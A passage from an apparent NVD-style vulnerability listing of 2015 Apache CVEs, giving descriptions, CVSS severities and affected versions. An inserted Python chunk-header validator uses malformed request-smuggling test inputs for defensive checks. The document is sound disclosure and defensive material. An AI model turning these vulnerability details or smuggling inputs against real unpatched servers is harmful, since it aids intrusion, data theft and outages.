CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.2
apache subversion 1.8.11
opensuse opensuse 13.2
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.7
opensuse opensuse 13.1
CVE-2015-0203 MEDIUM

The qpidd broker in Apache Qpid 0.30 and earlier allows remote authenticated users to cause a denial of service (daemon crash) via an AMQP message with (1) an invalid range in a sequence set, (2) content-bearing methods other than message-transfer, or (3) a session-gap control before a corresponding session-attach.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0223 MEDIUM

Unspecified vulnerability in Apache Qpid 0.30 and earlier allows remote attackers to bypass access restrictions on qpidd via unknown vectors, related to 0-10 connection handling.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0224 MEDIUM

qpidd in Apache Qpid 0.30 and earlier allows remote attackers to cause a denial of service (daemon crash) via a crafted protocol sequence set. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-0203.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0225 HIGH

The default configuration in Apache Cassandra 1.2.0 through 1.2.19, 2.0.0 through 2.0.13, and 2.1.0 through 2.1.3 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache cassandra 1.2.4
apache cassandra 2.0.7
apache cassandra 1.2.2
apache cassandra 2.0.9
apache cassandra 1.2.10
apache cassandra 1.2.11
apache cassandra 2.0.1
apache cassandra 2.0.13
apache cassandra 1.2.0
apache cassandra 1.2.13
apache cassandra 1.2.9
apache cassandra 1.2.12
apache cassandra 1.2.15
apache cassandra 1.2.18
apache cassandra 2.0.0
apache cassandra 1.2.7
apache cassandra 2.0.8
apache cassandra 2.1.2
apache cassandra 2.1.0
apache cassandra 1.2.1
apache cassandra 2.0.2
apache cassandra 1.2.14
apache cassandra 1.2.19
apache cassandra 2.0.3
apache cassandra 2.0.11
apache cassandra 2.1.1
apache cassandra 2.1.3
apache cassandra 1.2.8
apache cassandra 1.2.16
apache cassandra 1.2.6
apache cassandra 2.0.6
apache cassandra 1.2.3
apache cassandra 2.0.12
apache cassandra 1.2.5
apache cassandra 2.0.5
apache cassandra 2.0.4
apache cassandra 2.0.10
apache cassandra 1.2.17
CVE-2015-0226 MEDIUM

Apache WSS4J before 1.6.17 and 2.0.x before 2.0.2 improperly leaks information about decryption failures when decrypting an encrypted key or message data, which makes it easier for remote attackers to recover the plaintext form of a symmetric key via a series of crafted messages. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-2487.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache wss4j 2.0
apache wss4j 2.0.0
apache wss4j *
apache wss4j 2.0.1
CVE-2015-0227 MEDIUM

Apache WSS4J before 1.6.17 and 2.x before 2.0.2 allows remote attackers to bypass the requireSignedEncryptedDataElements configuration via vectors related to "wrapping attacks."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache wss4j 2.0.0
apache wss4j *
apache wss4j 2.0.1
CVE-2015-0228 MEDIUM

The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 12.04
apple mac_os_x 10.10.4
canonical ubuntu_linux 14.04
canonical ubuntu_linux 10.04
opensuse opensuse 13.2
canonical ubuntu_linux 14.10
apple mac_os_x_server 5.0.3
CVE-2015-0248 MEDIUM

The (1) mod_dav_svn and (2) svnserve servers in Subversion 1.6.0 through 1.7.19 and 1.8.0 through 1.8.11 allow remote attackers to cause a denial of service (assertion failure and abort) via crafted parameter combinations related to dynamically evaluated revision numbers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apple xcode 7.0
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.8.6
opensuse opensuse 13.2
redhat enterprise_linux_hpc_node 6
apache subversion 1.6.20
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
redhat enterprise_linux_workstation 6.0
apache subversion 1.6.5
apache subversion 1.6.15
oracle solaris 11.3
apache subversion 1.6.14
apache subversion 1.7.7
redhat enterprise_linux_server_eus 6.7.z
apache subversion 1.7.3
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
CVE-2015-0249 MEDIUM

The weblog page template in Apache Roller 5.1 through 5.1.1 allows remote authenticated users with admin privileges for a weblog to execute arbitrary Java code via crafted Velocity Text Language (aka VTL).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache roller 5.1.1
apache roller 5.1.0
CVE-2015-0250 MEDIUM

XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache batik *
redhat jboss_enterprise_brms_platform *
canonical ubuntu_linux 14.04
canonical ubuntu_linux 14.10
CVE-2015-0251 MEDIUM

The mod_dav_svn server in Subversion 1.5.0 through 1.7.19 and 1.8.0 through 1.8.11 allows remote authenticated users to spoof the svn:author property via crafted v1 HTTP protocol request sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apple xcode 7.0
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.8.6
opensuse opensuse 13.2
apache subversion 1.6.20
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
redhat enterprise_linux_workstation 6.0
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
oracle solaris 11.3
apache subversion 1.6.14
apache subversion 1.7.7
redhat enterprise_linux_server_eus 6.7.z
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
CVE-2015-0252 MEDIUM

internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 7.1
fedoraproject fedora 20
fedoraproject fedora 21
fedoraproject fedora 22
apache xerces-c++ *
CVE-2015-0253 MEDIUM

The read_request_line function in server/protocol.c in the Apache HTTP Server 2.4.12 does not initialize the protocol structure member, which allows remote attackers to cause a denial of service (NULL pointer dereference and process crash) by sending a request that lacks a method to an installation that enables the INCLUDES filter and has an ErrorDocument 400 directive specifying a local URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apple mac_os_x 10.10.4
oracle linux 7
oracle solaris 11.3
apache http_server 2.4.12
apple mac_os_x_server 5.0.3
CVE-2015-0254 HIGH

Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) <x:parse> or (2) <x:transform> JSTL XML tag.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache standard_taglibs *
canonical ubuntu_linux 14.04
canonical ubuntu_linux 14.10
CVE-2015-0263 MEDIUM

XML external entity (XXE) vulnerability in the XML converter setup in converter/jaxp/XmlConverter.java in Apache Camel before 2.13.4 and 2.14.x before 2.14.2 allows remote attackers to read arbitrary files via an external entity in an SAXSource.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel *
apache camel 2.14.1
CVE-2015-0264 MEDIUM

Multiple XML external entity (XXE) vulnerabilities in builder/xml/XPathBuilder.java in Apache Camel before 2.13.4 and 2.14.x before 2.14.2 allow remote attackers to read arbitrary files via an external entity in an invalid XML (1) String or (2) GenericFile object in an XPath query.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel *
apache camel 2.14.1
CVE-2015-0265 MEDIUM

Cross-site scripting (XSS) vulnerability in the Policy Admin Tool in Apache Ranger before 0.5.0 allows remote attackers to inject arbitrary web script or HTML via the HTTP User-Agent header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-0266 MEDIUM

The Policy Admin Tool in Apache Ranger before 0.5.0 allows remote authenticated users to bypass intended access restrictions via direct access to module URLs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-0899 MEDIUM

The MultiPageValidator implementation in Apache Struts 1 1.1 through 1.3.10 allows remote attackers to bypass intended access restrictions via a modified page parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.7
apache struts 1.3.5
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.1
apache struts 1.0
CVE-2015-1772 MEDIUM

The LDAP implementation in HiveServer2 in Apache Hive before 1.0.1 and 1.1.x before 1.1.1, as used in IBM InfoSphere BigInsights 3.0, 3.0.0.1, and 3.0.0.2 and other products, mishandles simple unauthenticated and anonymous bind configurations, which allows remote attackers to bypass authentication via a crafted LDAP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
ibm infosphere_biginsights 3.0.0.1
apache hive 1.1.0
apache hive 1.0.0
ibm infosphere_biginsights 3.0.0.2
ibm infosphere_biginsights 3.0.0.0
CVE-2015-1773 MEDIUM

Cross-site scripting (XSS) vulnerability in asdoc/templates/index.html in Apache Flex before 4.14.1 allows remote attackers to inject arbitrary web script or HTML by providing a crafted URI to JavaScript code generated by the asdoc component.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache flex *
CVE-2015-1774 MEDIUM

The HWP filter in LibreOffice before 4.3.7 and 4.4.x before 4.4.2 and Apache OpenOffice before 4.1.2 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted HWP document, which triggers an out-of-bounds write.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
fedoraproject fedora 21
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
canonical ubuntu_linux 12.04
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
libreoffice libreoffice 4.4.1
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 14.10
libreoffice libreoffice *
libreoffice libreoffice 4.4.0
CVE-2015-1775 MEDIUM

Server-side request forgery (SSRF) vulnerability in the proxy endpoint (api/v1/proxy) in Apache Ambari before 2.1.0 allows remote authenticated users to conduct port scans and access unsecured services via a crafted REST call.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari 1.5.1
apache ambari 2.0.1
apache ambari 1.5.0
apache ambari 2.0.2
apache ambari 1.6.1
apache ambari 2.0.0
apache ambari 1.6.0
CVE-2015-1776 LOW

Apache Hadoop 2.6.x encrypts intermediate data generated by a MapReduce job and stores it along with the encryption key in a credentials file on disk when the Intermediate data encryption feature is enabled, which allows local users to obtain sensitive information by reading the file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.6.1
CVE-2015-1830 MEDIUM

Directory traversal vulnerability in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.11.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
CVE-2015-1831 HIGH

The default exclude patterns (excludeParams) in Apache Struts 2.3.20 allow remote attackers to "compromise internal state of an application" via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.3.20
CVE-2015-1832 MEDIUM

XML external entity (XXE) vulnerability in the SqlXmlUtil code in Apache Derby before 10.12.1.1, when a Java Security Manager is not in place, allows context-dependent attackers to read arbitrary files or cause a denial of service (resource consumption) via vectors involving XmlVTI and the XML datatype.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,CWE-611,

Products Affected

Vendor Product Version
apache derby 10.10.2.0
apache derby 10.7.1.1
apache derby 10.2.1.6
apache derby 10.1.1.0
apache derby 10.11.1.1
apache derby 10.1.2.1
apache derby 10.8.3.0
apache derby 10.5.1.1
apache derby 10.2.2.0
apache derby 10.1.3.1
apache derby 10.4.2.0
apache derby 10.8.2.2
apache derby 10.8.1.2
apache derby 10.4.1.3
apache derby 10.6.2.1
apache derby 10.3.3.0
apache derby 10.5.3.0
apache derby 10.6.1.0
apache derby 10.9.1.0
apache derby 10.10.1.1
CVE-2015-1833 MEDIUM

XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jackrabbit 2.2.8
apache jackrabbit 2.4.0
apache jackrabbit 2.6.5
apache jackrabbit 2.2.1
apache jackrabbit 2.2.11
apache jackrabbit 2.6.1
apache jackrabbit 2.2.12
apache jackrabbit 2.2.7
apache jackrabbit *
apache jackrabbit 2.2.10
apache jackrabbit 2.4.4
apache jackrabbit 2.6.3
apache jackrabbit 2.2.5
apache jackrabbit 2.4.2
apache jackrabbit 2.2.9
apache jackrabbit 2.2.0
apache jackrabbit 2.2.2
apache jackrabbit 2.10.0
apache jackrabbit 2.2.13
apache jackrabbit 2.6.0
apache jackrabbit 2.4.3
apache jackrabbit 2.6.2
apache jackrabbit 2.2.4
apache jackrabbit 2.8.0
apache jackrabbit 2.4.1
apache jackrabbit 2.6.4
apache jackrabbit 2.4.5
CVE-2015-1835 LOW

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables (preferences) via a crafted intent: URL.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova 4.0.0
apache cordova 4.0.1
apache cordova *
CVE-2015-1836 HIGH

Apache HBase 0.98 before 0.98.12.1, 1.0 before 1.0.1.1, and 1.1 before 1.1.0.1, as used in IBM InfoSphere BigInsights 3.0, 3.0.0.1, and 3.0.0.2 and other products, uses incorrect ACLs for ZooKeeper coordination state, which allows remote attackers to cause a denial of service (daemon outage), obtain sensitive information, or modify data via unspecified client traffic.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hbase 0.98.1
apache hbase 0.98.3
apache hbase 0.98.6.1
apache hbase 0.98.9
ibm infosphere_biginsights 3.0.0.2
ibm infosphere_biginsights 3.0.0.0
apache hbase 0.98.10.1
apache hbase 0.98.2
ibm infosphere_biginsights 3.0.0.1
apache hbase 0.98.0
apache hbase 0.98.11
apache hbase 0.98.6
apache hbase 0.98.7
apache hbase 0.98.5
apache hbase 0.98.10
apache hbase 0.98.4
apache hbase 0.98.8
apache hbase 0.98.12
CVE-2015-2091 MEDIUM

The authentication hook (mgs_hook_authz) in mod-gnutls 0.5.10 and earlier does not validate client certificates when "GnuTLSClientVerify require" is set, which allows remote attackers to spoof clients via a crafted certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache mod-gnutls *
CVE-2015-2944 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Sling API before 2.2.2 and Apache Sling Servlets Post before 2.1.2 allow remote attackers to inject arbitrary web script or HTML via the URI, related to (1) org/apache/sling/api/servlets/HtmlResponse and (2) org/apache/sling/servlets/post/HtmlResponse.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_api *
apache sling_servlets_post *
CVE-2015-2992 MEDIUM

Apache Struts before 2.3.20 has a cross-site scripting (XSS) vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2015-3183 MEDIUM

The chunked transfer coding implementation in the Apache HTTP Server before 2.4.14 does not properly parse chunk headers, which allows remote attackers to conduct HTTP request smuggling attacks via a crafted request, related to mishandling of large chunk-size values and invalid chunk-extension characters in modules/http/http_filters.c.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-17,CWE-20,

Products Affected

Vendor Product Version
apache http_server *
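The smuggling risk in CVE-2015-3183 comes from two parsers in one request path (a proxy and the origin, or a front-end filter and the server) reading the same chunk-size line differently. The following Python is an added example, not code from httpd or from this advisory: a chunk-header parser that refuses every form the RFC 7230 grammar does not allow instead of tolerating it. The digit cap and the 32-bit size limit are assumptions chosen to mirror a server that stores the chunk size in a signed 32-bit field.

```python
import re
from typing import Dict, Optional, Tuple

# Assumed limits for this example (not taken from httpd's source): a server that
# keeps the chunk size in a 32-bit signed field has to refuse values that do not
# fit, and refusing on digit count before converting avoids the overflow entirely.
MAX_HEX_DIGITS = 8            # 8 hex digits covers every value below 2**32
MAX_CHUNK_SIZE = 0x7FFFFFFF   # largest value a 32-bit signed size field can hold

# RFC 7230 grammar:
#   chunk-size    = 1*HEXDIG
#   chunk-ext     = *( ";" chunk-ext-name [ "=" chunk-ext-val ] )
#   chunk-ext-val = token / quoted-string
_HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"(?:[\t !#-\[\]-~]|\\[\t -~])*"'
_EXT_RE = re.compile(rf"^({_TOKEN})(?:=({_TOKEN}|{_QUOTED}))?$")


class ChunkHeaderError(ValueError):
    """Raised for any chunk-size line that is not unambiguously valid."""


def parse_chunk_header(line: bytes) -> Tuple[int, Dict[str, Optional[str]]]:
    """Strictly parse one chunk-size line (without its CRLF terminator).

    Returns (size, extensions). Anything outside the RFC grammar is rejected
    rather than guessed at: request smuggling needs two parsers in the same
    chain to read the same bytes differently, and leniency is what creates
    that difference.
    """
    try:
        text = line.decode("ascii")
    except UnicodeDecodeError:
        raise ChunkHeaderError("non-ASCII byte in chunk header") from None
    if any(ch in text for ch in "\r\n\0"):
        raise ChunkHeaderError("control character inside chunk header")

    size_hex, sep, rest = text.partition(";")
    # Validate before converting: int(size_hex, 16) on its own accepts "0x1a",
    # "+1a", "1_a" and surrounding whitespace, each of which another parser in
    # the chain may treat differently.
    if not _HEX_RE.match(size_hex):
        raise ChunkHeaderError(f"chunk-size is not 1*HEXDIG: {size_hex!r}")
    if len(size_hex) > MAX_HEX_DIGITS:
        raise ChunkHeaderError("chunk-size has too many digits")
    size = int(size_hex, 16)
    if size > MAX_CHUNK_SIZE:
        raise ChunkHeaderError("chunk-size does not fit the size field")

    extensions: Dict[str, Optional[str]] = {}
    if sep:
        for ext in rest.split(";"):
            match = _EXT_RE.match(ext)
            if not match:
                raise ChunkHeaderError(f"malformed chunk-ext: {ext!r}")
            extensions[match.group(1).lower()] = match.group(2)
    return size, extensions


def classify(line: bytes) -> str:
    """'ok:<size>' for an accepted line, 'reject:<reason>' otherwise."""
    try:
        size, _ = parse_chunk_header(line)
        return f"ok:{size}"
    except ChunkHeaderError as exc:
        return f"reject:{exc}"


if __name__ == "__main__":
    # Constructed sample lines, not captured traffic.
    for sample in (b"1a", b"1A;name=value", b'1a;x="q"', b"0", b"7fffffff",
                   b"80000000", b"FFFFFFFFF", b"0x1a", b" 1a", b"+1a",
                   b"1a;bad ext", b"1a\r"):
        print(sample, "->", classify(sample))
```

The useful check when reviewing a proxy chain is to feed the same set of borderline lines (leading whitespace, a sign, a "0x" prefix, nine hex digits, a space inside an extension) to every hop and confirm they all reject the same lines; any line one hop accepts and another rejects is a smuggling candidate.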
CVE-2015-3184 MEDIUM

mod_authz_svn in Apache Subversion 1.7.x before 1.7.21 and 1.8.x before 1.8.14, when using Apache httpd 2.4.x, does not properly restrict anonymous access, which allows remote anonymous users to read hidden files via the path name.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apple xcode *
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.13
apache subversion 1.7.11
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.7.20
apache subversion 1.7.12
apache subversion 1.7.17
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.7
CVE-2015-3185 MEDIUM

The ap_some_auth_required function in server/request.c in the Apache HTTP Server 2.4.x before 2.4.14 does not consider that a Require directive may be associated with an authorization setting rather than an authentication setting, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging the presence of a module that relies on the 2.2 API behavior.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
canonical ubuntu_linux 15.04
apache http_server 2.4.13
apache http_server 2.4.2
apache http_server 2.4.6
apple xcode 7.0
apache http_server 2.4.12
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
apple mac_os_x 10.10.4
apache http_server 2.4.8
canonical ubuntu_linux 14.04
apache http_server 2.4.9
apple mac_os_x_server 5.0.3
CVE-2015-3186 LOW

Cross-site scripting (XSS) vulnerability in Apache Ambari before 2.1.0 allows remote authenticated cluster operator users to inject arbitrary web script or HTML via the note field in a configuration change.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari *
apache ambari 2.0.1
apache ambari 2.0.0
CVE-2015-3187 MEDIUM

The svn_repos_trace_node_locations function in Apache Subversion before 1.7.21 and 1.8.x before 1.8.14, when path-based authorization is used, allows remote authenticated users to obtain sensitive path information by reading the history of a node that has been moved from a hidden path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apple xcode *
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion *
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.13
apache subversion 1.8.7
CVE-2015-3188 HIGH

The UI daemon in Apache Storm 0.10.0 before 0.10.0-beta1 allows remote attackers to execute arbitrary code via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache storm 0.10.0
CVE-2015-3249 HIGH

The HTTP/2 experimental feature in Apache Traffic Server 5.3.x before 5.3.1 allows remote attackers to cause a denial of service (out-of-bounds access and daemon crash) or possibly execute arbitrary code via vectors related to the (1) frame_handlers array or (2) set_dynamic_table_size function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server 5.3.0
CVE-2015-3250 MEDIUM

Apache Directory LDAP API before 1.0.0-M31 allows attackers to conduct timing attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache directory_ldap_api *
CVE-2015-3251 MEDIUM

Apache CloudStack before 4.5.2 might allow remote authenticated administrators to obtain sensitive password information for root accounts of virtual machines via unspecified vectors related to API calls.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.4.4
apache cloudstack 4.5.1
CVE-2015-3252 MEDIUM

Apache CloudStack before 4.5.2 does not properly preserve VNC passwords when migrating KVM virtual machines, which allows remote attackers to gain access by connecting to the VNC server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2015-3253 HIGH

The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache groovy 2.1.3
apache groovy 2.1.0
apache groovy 2.3.7
apache groovy 2.4.3
apache groovy 2.1.4
apache groovy 1.8.5
oracle retail_order_broker_cloud_service 5.1
apache groovy 2.0.0
apache groovy 2.1.7
apache groovy 1.8.7
apache groovy 1.7.6
apache groovy 2.3.10
apache groovy 1.7.4
apache groovy 2.0.4
apache groovy 1.9.0
oracle retail_store_inventory_management 13.2
apache groovy 1.8.3
oracle retail_order_broker_cloud_service 15.0
oracle webcenter_sites 12.2.1
oracle health_sciences_clinical_development_center 3.1.2
apache groovy 1.7.3
apache groovy 2.3.11
oracle retail_order_broker_cloud_service 5.2
apache groovy 1.7.8
apache groovy 2.3.1
apache groovy 2.0.7
oracle retail_store_inventory_management 14.1
apache groovy 2.0.5
apache groovy 2.1.2
apache groovy 2.3.0
apache groovy 1.8.6
apache groovy 1.8.1
apache groovy 2.0.8
apache groovy 2.4.2
apache groovy 1.7.11
apache groovy 2.3.4
apache groovy 2.3.3
apache groovy 2.3.2
